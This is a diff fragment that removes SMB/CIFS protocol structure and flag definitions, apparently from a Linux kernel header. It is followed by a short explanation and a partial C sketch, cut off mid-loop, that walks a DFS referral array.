+-	struct smb_hdr hdr;	/* wct = 23 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
+-	__le32 FunctionCode;
+-	__u16 Fid;
+-	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
+-	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
+-	__le16 ByteCount;
+-	__u8 Pad[3];
+-	__le16 compression_state;  /* See below for valid flags */
+-} __attribute__((packed)) TRANSACT_COMPR_IOCTL_REQ;
+-
+-/* compression state flags */
+-#define COMPRESSION_FORMAT_NONE		0x0000
+-#define COMPRESSION_FORMAT_DEFAULT	0x0001
+-#define COMPRESSION_FORMAT_LZNT1	0x0002
+-
+-typedef struct smb_com_transaction_ioctl_rsp {
+-	struct smb_hdr hdr;	/* wct = 19 */
+-	__u8 Reserved[3];
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 ParameterDisplacement;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__le32 DataDisplacement;
+-	__u8 SetupCount;	/* 1 */
+-	__le16 ReturnedDataLen;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACT_IOCTL_RSP;
+-
+-#define CIFS_ACL_OWNER 1
+-#define CIFS_ACL_GROUP 2
+-#define CIFS_ACL_DACL  4
+-#define CIFS_ACL_SACL  8
+-
+-typedef struct smb_com_transaction_qsec_req {
+-	struct smb_hdr hdr;     /* wct = 19 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* no setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 6 = QUERY_SECURITY_DESC */
+-	__le16 ByteCount; /* bcc = 3 + 8 */
+-	__u8 Pad[3];
+-	__u16 Fid;
+-	__u16 Reserved2;
+-	__le32 AclFlags;
+-} __attribute__((packed)) QUERY_SEC_DESC_REQ;
+-
+-
+-typedef struct smb_com_transaction_ssec_req {
+-	struct smb_hdr hdr;     /* wct = 19 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* no setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 3 = SET_SECURITY_DESC */
+-	__le16 ByteCount; /* bcc = 3 + 8 */
+-	__u8 Pad[3];
+-	__u16 Fid;
+-	__u16 Reserved2;
+-	__le32 AclFlags;
+-} __attribute__((packed)) SET_SEC_DESC_REQ;
+-
+-typedef struct smb_com_transaction_change_notify_req {
+-	struct smb_hdr hdr;     /* wct = 23 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand;/* 4 = Change Notify */
+-	__le32 CompletionFilter;  /* operation to monitor */
+-	__u16 Fid;
+-	__u8 WatchTree;  /* 1 = Monitor subdirectories */
+-	__u8 Reserved2;
+-	__le16 ByteCount;
+-/* 	__u8 Pad[3];*/
+-/*	__u8 Data[1];*/
+-} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_REQ;
+-
+-/* BB eventually change to use generic ntransact rsp struct
+-      and validation routine */
+-typedef struct smb_com_transaction_change_notify_rsp {
+-	struct smb_hdr hdr;	/* wct = 18 */
+-	__u8 Reserved[3];
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 ParameterDisplacement;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__le32 DataDisplacement;
+-	__u8 SetupCount;   /* 0 */
+-	__u16 ByteCount;
+-	/* __u8 Pad[3]; */
+-} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_RSP;
+-/* Completion Filter flags for Notify */
+-#define FILE_NOTIFY_CHANGE_FILE_NAME    0x00000001
+-#define FILE_NOTIFY_CHANGE_DIR_NAME     0x00000002
+-#define FILE_NOTIFY_CHANGE_NAME         0x00000003
+-#define FILE_NOTIFY_CHANGE_ATTRIBUTES   0x00000004
+-#define FILE_NOTIFY_CHANGE_SIZE         0x00000008
+-#define FILE_NOTIFY_CHANGE_LAST_WRITE   0x00000010
+-#define FILE_NOTIFY_CHANGE_LAST_ACCESS  0x00000020
+-#define FILE_NOTIFY_CHANGE_CREATION     0x00000040
+-#define FILE_NOTIFY_CHANGE_EA           0x00000080
+-#define FILE_NOTIFY_CHANGE_SECURITY     0x00000100
+-#define FILE_NOTIFY_CHANGE_STREAM_NAME  0x00000200
+-#define FILE_NOTIFY_CHANGE_STREAM_SIZE  0x00000400
+-#define FILE_NOTIFY_CHANGE_STREAM_WRITE 0x00000800
+-
+-#define FILE_ACTION_ADDED		0x00000001
+-#define FILE_ACTION_REMOVED		0x00000002
+-#define FILE_ACTION_MODIFIED		0x00000003
+-#define FILE_ACTION_RENAMED_OLD_NAME	0x00000004
+-#define FILE_ACTION_RENAMED_NEW_NAME	0x00000005
+-#define FILE_ACTION_ADDED_STREAM	0x00000006
+-#define FILE_ACTION_REMOVED_STREAM	0x00000007
+-#define FILE_ACTION_MODIFIED_STREAM	0x00000008
+-
+-/* response contains array of the following structures */
+-struct file_notify_information {
+-	__le32 NextEntryOffset;
+-	__le32 Action;
+-	__le32 FileNameLength;
+-	__u8  FileName[];
+-} __attribute__((packed));
+-
+-/* For IO_REPARSE_TAG_SYMLINK */
+-struct reparse_symlink_data {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le16	SubstituteNameOffset;
+-	__le16	SubstituteNameLength;
+-	__le16	PrintNameOffset;
+-	__le16	PrintNameLength;
+-	__le32	Flags;
+-	char	PathBuffer[];
+-} __attribute__((packed));
+-
+-/* Flag above */
+-#define SYMLINK_FLAG_RELATIVE 0x00000001
+-
+-/* For IO_REPARSE_TAG_NFS */
+-#define NFS_SPECFILE_LNK	0x00000000014B4E4C
+-#define NFS_SPECFILE_CHR	0x0000000000524843
+-#define NFS_SPECFILE_BLK	0x00000000004B4C42
+-#define NFS_SPECFILE_FIFO	0x000000004F464946
+-#define NFS_SPECFILE_SOCK	0x000000004B434F53
+-struct reparse_posix_data {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le64	InodeType; /* LNK, FIFO, CHR etc. */
+-	char	PathBuffer[];
+-} __attribute__((packed));
+-
+-struct cifs_quota_data {
+-	__u32	rsrvd1;  /* 0 */
+-	__u32	sid_size;
+-	__u64	rsrvd2;  /* 0 */
+-	__u64	space_used;
+-	__u64	soft_limit;
+-	__u64	hard_limit;
+-	char	sid[1];  /* variable size? */
+-} __attribute__((packed));
+-
+-/* quota sub commands */
+-#define QUOTA_LIST_CONTINUE	    0
+-#define QUOTA_LIST_START	0x100
+-#define QUOTA_FOR_SID		0x101
+-
+-struct trans2_req {
+-	/* struct smb_hdr hdr precedes. Set wct = 14+ */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand; /* 1st setup word - SetupCount words follow */
+-	__le16 ByteCount;
+-} __attribute__((packed));
+-
+-struct smb_t2_req {
+-	struct smb_hdr hdr;
+-	struct trans2_req t2_req;
+-} __attribute__((packed));
+-
+-struct trans2_resp {
+-	/* struct smb_hdr hdr precedes. Note wct = 10 + setup count */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__u16 Reserved;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 ParameterDisplacement;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__le16 DataDisplacement;
+-	__u8 SetupCount;
+-	__u8 Reserved1;
+-	/* SetupWords[SetupCount];
+-	__u16 ByteCount;
+-	__u16 Reserved2;*/
+-	/* data area follows */
+-} __attribute__((packed));
+-
+-struct smb_t2_rsp {
+-	struct smb_hdr hdr;
+-	struct trans2_resp t2_rsp;
+-} __attribute__((packed));
+-
+-/* PathInfo/FileInfo infolevels */
+-#define SMB_INFO_STANDARD                   1
+-#define SMB_SET_FILE_EA                     2
+-#define SMB_QUERY_FILE_EA_SIZE              2
+-#define SMB_INFO_QUERY_EAS_FROM_LIST        3
+-#define SMB_INFO_QUERY_ALL_EAS              4
+-#define SMB_INFO_IS_NAME_VALID              6
+-#define SMB_QUERY_FILE_BASIC_INFO       0x101
+-#define SMB_QUERY_FILE_STANDARD_INFO    0x102
+-#define SMB_QUERY_FILE_EA_INFO          0x103
+-#define SMB_QUERY_FILE_NAME_INFO        0x104
+-#define SMB_QUERY_FILE_ALLOCATION_INFO  0x105
+-#define SMB_QUERY_FILE_END_OF_FILEINFO  0x106
+-#define SMB_QUERY_FILE_ALL_INFO         0x107
+-#define SMB_QUERY_ALT_NAME_INFO         0x108
+-#define SMB_QUERY_FILE_STREAM_INFO      0x109
+-#define SMB_QUERY_FILE_COMPRESSION_INFO 0x10B
+-#define SMB_QUERY_FILE_UNIX_BASIC       0x200
+-#define SMB_QUERY_FILE_UNIX_LINK        0x201
+-#define SMB_QUERY_POSIX_ACL             0x204
+-#define SMB_QUERY_XATTR                 0x205  /* e.g. system EA name space */
+-#define SMB_QUERY_ATTR_FLAGS            0x206  /* append,immutable etc. */
+-#define SMB_QUERY_POSIX_PERMISSION      0x207
+-#define SMB_QUERY_POSIX_LOCK            0x208
+-/* #define SMB_POSIX_OPEN               0x209 */
+-/* #define SMB_POSIX_UNLINK             0x20a */
+-#define SMB_QUERY_FILE__UNIX_INFO2      0x20b
+-#define SMB_QUERY_FILE_INTERNAL_INFO    0x3ee
+-#define SMB_QUERY_FILE_ACCESS_INFO      0x3f0
+-#define SMB_QUERY_FILE_NAME_INFO2       0x3f1 /* 0x30 bytes */
+-#define SMB_QUERY_FILE_POSITION_INFO    0x3f6
+-#define SMB_QUERY_FILE_MODE_INFO        0x3f8
+-#define SMB_QUERY_FILE_ALGN_INFO        0x3f9
+-
+-
+-#define SMB_SET_FILE_BASIC_INFO	        0x101
+-#define SMB_SET_FILE_DISPOSITION_INFO   0x102
+-#define SMB_SET_FILE_ALLOCATION_INFO    0x103
+-#define SMB_SET_FILE_END_OF_FILE_INFO   0x104
+-#define SMB_SET_FILE_UNIX_BASIC         0x200
+-#define SMB_SET_FILE_UNIX_LINK          0x201
+-#define SMB_SET_FILE_UNIX_HLINK         0x203
+-#define SMB_SET_POSIX_ACL               0x204
+-#define SMB_SET_XATTR                   0x205
+-#define SMB_SET_ATTR_FLAGS              0x206  /* append, immutable etc. */
+-#define SMB_SET_POSIX_LOCK              0x208
+-#define SMB_POSIX_OPEN                  0x209
+-#define SMB_POSIX_UNLINK                0x20a
+-#define SMB_SET_FILE_UNIX_INFO2         0x20b
+-#define SMB_SET_FILE_BASIC_INFO2        0x3ec
+-#define SMB_SET_FILE_RENAME_INFORMATION 0x3f2 /* BB check if qpathinfo too */
+-#define SMB_FILE_ALL_INFO2              0x3fa
+-#define SMB_SET_FILE_ALLOCATION_INFO2   0x3fb
+-#define SMB_SET_FILE_END_OF_FILE_INFO2  0x3fc
+-#define SMB_FILE_MOVE_CLUSTER_INFO      0x407
+-#define SMB_FILE_QUOTA_INFO             0x408
+-#define SMB_FILE_REPARSEPOINT_INFO      0x409
+-#define SMB_FILE_MAXIMUM_INFO           0x40d
+-
+-/* Find File infolevels */
+-#define SMB_FIND_FILE_INFO_STANDARD       0x001
+-#define SMB_FIND_FILE_QUERY_EA_SIZE       0x002
+-#define SMB_FIND_FILE_QUERY_EAS_FROM_LIST 0x003
+-#define SMB_FIND_FILE_DIRECTORY_INFO      0x101
+-#define SMB_FIND_FILE_FULL_DIRECTORY_INFO 0x102
+-#define SMB_FIND_FILE_NAMES_INFO          0x103
+-#define SMB_FIND_FILE_BOTH_DIRECTORY_INFO 0x104
+-#define SMB_FIND_FILE_ID_FULL_DIR_INFO    0x105
+-#define SMB_FIND_FILE_ID_BOTH_DIR_INFO    0x106
+-#define SMB_FIND_FILE_UNIX                0x202
+-/* #define SMB_FIND_FILE_POSIX_INFO          0x064 */
+-
+-typedef struct smb_com_transaction2_qpi_req {
+-	struct smb_hdr hdr;	/* wct = 14+ */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__le16 InformationLevel;
+-	__u32 Reserved4;
+-	char FileName[1];
+-} __attribute__((packed)) TRANSACTION2_QPI_REQ;
+-
+-typedef struct smb_com_transaction2_qpi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
+-} __attribute__((packed)) TRANSACTION2_QPI_RSP;
+-
+-typedef struct smb_com_transaction2_spi_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 Pad1;
+-	__le16 InformationLevel;
+-	__u32 Reserved4;
+-	char FileName[1];
+-} __attribute__((packed)) TRANSACTION2_SPI_REQ;
+-
+-typedef struct smb_com_transaction2_spi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
+-} __attribute__((packed)) TRANSACTION2_SPI_RSP;
+-
+-struct set_file_rename {
+-	__le32 overwrite;   /* 1 = overwrite dest */
+-	__u32 root_fid;   /* zero */
+-	__le32 target_name_len;
+-	char  target_name[];  /* Must be unicode */
+-} __attribute__((packed));
+-
+-struct smb_com_transaction2_sfi_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 Pad1;
+-	__u16 Fid;
+-	__le16 InformationLevel;
+-	__u16 Reserved4;
+-	__u8  payload[];
+-} __attribute__((packed));
+-
+-struct smb_com_transaction2_sfi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2;	/* parameter word reserved -
+-					present for infolevels > 100 */
+-} __attribute__((packed));
+-
+-struct smb_t2_qfi_req {
+-	struct	smb_hdr hdr;
+-	struct	trans2_req t2;
+-	__u8	Pad;
+-	__u16	Fid;
+-	__le16	InformationLevel;
+-} __attribute__((packed));
+-
+-struct smb_t2_qfi_rsp {
+-	struct smb_hdr hdr;     /* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u16 Reserved2;        /* parameter word reserved -
+-				   present for infolevels > 100 */
+-} __attribute__((packed));
+-
+-/*
+- * Flags on T2 FINDFIRST and FINDNEXT
+- */
+-#define CIFS_SEARCH_CLOSE_ALWAYS  0x0001
+-#define CIFS_SEARCH_CLOSE_AT_END  0x0002
+-#define CIFS_SEARCH_RETURN_RESUME 0x0004
+-#define CIFS_SEARCH_CONTINUE_FROM_LAST 0x0008
+-#define CIFS_SEARCH_BACKUP_SEARCH 0x0010
+-
+-/*
+- * Size of the resume key on FINDFIRST and FINDNEXT calls
+- */
+-#define CIFS_SMB_RESUME_KEY_SIZE 4
+-
+-typedef struct smb_com_transaction2_ffirst_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_FIND_FIRST */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__le16 SearchAttributes;
+-	__le16 SearchCount;
+-	__le16 SearchFlags;
+-	__le16 InformationLevel;
+-	__le32 SearchStorageType;
+-	char FileName[1];
+-} __attribute__((packed)) TRANSACTION2_FFIRST_REQ;
+-
+-typedef struct smb_com_transaction2_ffirst_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACTION2_FFIRST_RSP;
+-
+-typedef struct smb_com_transaction2_ffirst_rsp_parms {
+-	__u16 SearchHandle;
+-	__le16 SearchCount;
+-	__le16 EndofSearch;
+-	__le16 EAErrorOffset;
+-	__le16 LastNameOffset;
+-} __attribute__((packed)) T2_FFIRST_RSP_PARMS;
+-
+-typedef struct smb_com_transaction2_fnext_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_FIND_NEXT */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 SearchHandle;
+-	__le16 SearchCount;
+-	__le16 InformationLevel;
+-	__u32 ResumeKey;
+-	__le16 SearchFlags;
+-	char ResumeFileName[];
+-} __attribute__((packed)) TRANSACTION2_FNEXT_REQ;
+-
+-typedef struct smb_com_transaction2_fnext_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACTION2_FNEXT_RSP;
+-
+-typedef struct smb_com_transaction2_fnext_rsp_parms {
+-	__le16 SearchCount;
+-	__le16 EndofSearch;
+-	__le16 EAErrorOffset;
+-	__le16 LastNameOffset;
+-} __attribute__((packed)) T2_FNEXT_RSP_PARMS;
+-
+-/* QFSInfo Levels */
+-#define SMB_INFO_ALLOCATION         1
+-#define SMB_INFO_VOLUME             2
+-#define SMB_QUERY_FS_VOLUME_INFO    0x102
+-#define SMB_QUERY_FS_SIZE_INFO      0x103
+-#define SMB_QUERY_FS_DEVICE_INFO    0x104
+-#define SMB_QUERY_FS_ATTRIBUTE_INFO 0x105
+-#define SMB_QUERY_CIFS_UNIX_INFO    0x200
+-#define SMB_QUERY_POSIX_FS_INFO     0x201
+-#define SMB_QUERY_POSIX_WHO_AM_I    0x202
+-#define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203
+-#define SMB_QUERY_FS_PROXY          0x204 /* WAFS enabled. Returns structure
+-					    FILE_SYSTEM_UNIX_INFO to tell
+-					    whether the new NTIOCTL (0xACE)
+-					    is available for WAN friendly SMB
+-					    operations to be carried out */
+-#define SMB_QUERY_LABEL_INFO        0x3ea
+-#define SMB_QUERY_FS_QUOTA_INFO     0x3ee
+-#define SMB_QUERY_FS_FULL_SIZE_INFO 0x3ef
+-#define SMB_QUERY_OBJECTID_INFO     0x3f0
+-
+-typedef struct smb_com_transaction2_qfsi_req {
+-	struct smb_hdr hdr;	/* wct = 14+ */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__le16 InformationLevel;
+-} __attribute__((packed)) TRANSACTION2_QFSI_REQ;
+-
+-typedef struct smb_com_transaction_qfsi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u8 Pad;	/* may be three bytes? followed by data area */
+-} __attribute__((packed)) TRANSACTION2_QFSI_RSP;
+-
+-typedef struct whoami_rsp_data { /* Query level 0x202 */
+-	__u32 flags; /* 0 = Authenticated user 1 = GUEST */
+-	__u32 mask; /* which flags bits server understands ie 0x0001 */
+-	__u64 unix_user_id;
+-	__u64 unix_user_gid;
+-	__u32 number_of_supplementary_gids; /* may be zero */
+-	__u32 number_of_sids; /* may be zero */
+-	__u32 length_of_sid_array; /* in bytes - may be zero */
+-	__u32 pad; /* reserved - MBZ */
+-	/* __u64 gid_array[0]; */  /* may be empty */
+-	/* __u8 * psid_list */  /* may be empty */
+-} __attribute__((packed)) WHOAMI_RSP_DATA;
+-
+-/* SETFSInfo Levels */
+-#define SMB_SET_CIFS_UNIX_INFO    0x200
+-/* level 0x203 is defined above in list of QFS info levels */
+-/* #define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203 */
+-
+-/* Level 0x200 request structure follows */
+-typedef struct smb_com_transaction2_setfsi_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;	/* 4 */
+-	__le16 ParameterOffset;
+-	__le16 DataCount;	/* 12 */
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 FileNum;		/* Parameters start. */
+-	__le16 InformationLevel;/* Parameters end. */
+-	__le16 ClientUnixMajor; /* Data start. */
+-	__le16 ClientUnixMinor;
+-	__le64 ClientUnixCap;   /* Data end */
+-} __attribute__((packed)) TRANSACTION2_SETFSI_REQ;
+-
+-/* level 0x203 request structure follows */
+-typedef struct smb_com_transaction2_setfs_enc_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;	/* 4 */
+-	__le16 ParameterOffset;
+-	__le16 DataCount;	/* 12 */
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16  Reserved4;	/* Parameters start. */
+-	__le16 InformationLevel;/* Parameters end. */
+-	/* NTLMSSP Blob, Data start. */
+-} __attribute__((packed)) TRANSACTION2_SETFSI_ENC_REQ;
+-
+-/* response for setfsinfo levels 0x200 and 0x203 */
+-typedef struct smb_com_transaction2_setfsi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACTION2_SETFSI_RSP;
+-
+-typedef struct smb_com_transaction2_get_dfs_refer_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad[3];		/* Win2K has sent 0x0F01 (max response length
+-				   perhaps?) followed by one byte pad - doesn't
+-				   seem to matter though */
+-	__le16 MaxReferralLevel;
+-	char RequestFileName[1];
+-} __attribute__((packed)) TRANSACTION2_GET_DFS_REFER_REQ;
+-
+-#define DFS_VERSION cpu_to_le16(0x0003)
+-
+-/* DFS server target type */
+-#define DFS_TYPE_LINK 0x0000  /* also for sysvol targets */
+-#define DFS_TYPE_ROOT 0x0001
+-
+-/* Referral Entry Flags */
+-#define DFS_NAME_LIST_REF 0x0200 /* set for domain or DC referral responses */
+-#define DFS_TARGET_SET_BOUNDARY 0x0400 /* only valid with version 4 dfs req */
+-
+-typedef struct dfs_referral_level_3 { /* version 4 is same, + one flag bit */
+-	__le16 VersionNumber;  /* must be 3 or 4 */
+-	__le16 Size;
+-	__le16 ServerType; /* 0x0001 = root targets; 0x0000 = link targets */
+-	__le16 ReferralEntryFlags;
+-	__le32 TimeToLive;
+-	__le16 DfsPathOffset;
+-	__le16 DfsAlternatePathOffset;
+-	__le16 NetworkAddressOffset; /* offset of the link target */
+-	__u8   ServiceSiteGuid[16];  /* MBZ, ignored */
+-} __attribute__((packed)) REFERRAL3;
+-
+-struct get_dfs_referral_rsp {
+-	__le16 PathConsumed;
+-	__le16 NumberOfReferrals;
+-	__le32 DFSFlags;
+-	REFERRAL3 referrals[1];	/* array of level 3 dfs_referral structures */
+-	/* followed by the strings pointed to by the referral structures */
+-} __packed;
+-
+-typedef struct smb_com_transaction_get_dfs_refer_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u8 Pad;
+-	struct get_dfs_referral_rsp dfs_data;
+-} __packed TRANSACTION2_GET_DFS_REFER_RSP;
+-
+-/* DFS Flags */
+-#define DFSREF_REFERRAL_SERVER  0x00000001 /* all targets are DFS roots */
+-#define DFSREF_STORAGE_SERVER   0x00000002 /* no further ref requests needed */
+-#define DFSREF_TARGET_FAILBACK  0x00000004 /* only for DFS referral version 4 */
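
Each REFERRAL3 entry above carries its own Size, and its string offsets (DfsPathOffset, NetworkAddressOffset) are relative to the start of that entry, so a parser walks the packed referral array in Size-byte hops. Below is a minimal stand-alone sketch of that walk over the raw little-endian wire bytes; it is not from the kernel sources, the helper names are hypothetical, and bounds checking is kept minimal:

#include <stdint.h>
#include <stdio.h>

static uint16_t get_le16(const uint8_t *p)
{
	return (uint16_t)(p[0] | (p[1] << 8));
}

static void walk_dfs_referrals(const uint8_t *buf, size_t len)
{
	uint16_t nrefs = get_le16(buf + 2);	/* NumberOfReferrals */
	const uint8_t *entry = buf + 8;		/* first REFERRAL3 entry */

	while (nrefs-- > 0 && (size_t)(entry - buf) + 18 <= len) {
		uint16_t size   = get_le16(entry + 2);	/* Size of this entry */
		uint16_t tgtoff = get_le16(entry + 16);	/* NetworkAddressOffset */

		printf("entry: %u bytes, target string at entry+%u\n",
		       size, tgtoff);
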